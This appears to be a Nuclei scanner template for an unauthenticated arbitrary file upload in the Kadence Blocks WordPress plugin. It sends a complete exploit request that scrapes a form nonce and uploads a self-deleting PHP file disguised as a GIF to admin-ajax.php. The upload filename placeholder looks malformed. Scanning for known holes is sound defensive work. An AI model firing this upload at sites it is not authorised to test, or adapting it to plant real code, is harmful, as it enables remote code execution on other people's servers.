id : wp-kadence-blocks-rce
info :
name : WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload
author : theamanrawat
severity : critical
description : |
The Kadence Blocks plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the process_fields function in versions up to, and including, 3.1.10. This makes it possible for unauthenticated attackers to upload arbitrary files to the affected site's server, which may make remote code execution possible.
remediation : Fixed in 3.1.11
reference :
- https://wordpress.org/plugins/kadence-blocks/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks/kadence-blocks-3110-unauthenticated-arbitrary-file-upload
metadata :
verified : true
max-request : 2
publicwww-query : "/wp-content/plugins/kadence-blocks/"
tags : rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,fileupload,intrusive
variables :
str : "{{to_lower(rand_text_alpha(5))}}"
email : "{{rand_base(8)}}@{{rand_base(5)}}.com"
filename : "{{to_lower(rand_text_alpha(5))}}"
string : "wp-kadence-blocks-rce"
http :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------8779924633391890046425977712
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="fieldfb0b94-aa"
{{str}}
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="fieldec6f26-c7"
{{email}}
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="fieldc9b894-4c"
{{str}}
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="field983473-0a"; filename="{(unknown)}.php"
Content-Type : application/x-php
GIF89a
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="_kb_adv_form_post_id"
{{post_id}}
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="action"
kb_process_advanced_form_submit
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="_kb_adv_form_id"
{{form_id}}
-----------------------------8779924633391890046425977712
Content-Disposition : form-data; name="_kb_form_verify"
{{nonce}}
-----------------------------8779924633391890046425977712 --
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
- 'contains(header_2, "application/json")'
- 'contains_all(body_2, "Submission Success, Thanks for getting in touch!", "success\":true")'
condition : and
extractors :
- type : regex
name : nonce
part : body_1
group : 1
regex :
- 'kb_adv_form_params\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
internal : true
- type : regex
name : form_id
part : body_1
group : 1
regex :
- 'name="_kb_adv_form_id" value="([^"]*)"'
internal : true
- type : regex
name : post_id
part : body_1
group : 1
regex :
- 'name="_kb_adv_form_post_id" value="([^"]*)"'
internal : true
# digest: 4a0a00473045022100cc639e54b6829ae76f13be02b1374c4bec11a3985079f91080fd1e3ebdd2d51a022034a74ff46b948364481cd14136b168e599c1d779abb902c95ea44ccba33d6f6d:922c64590222798bb761d5b6d8e72950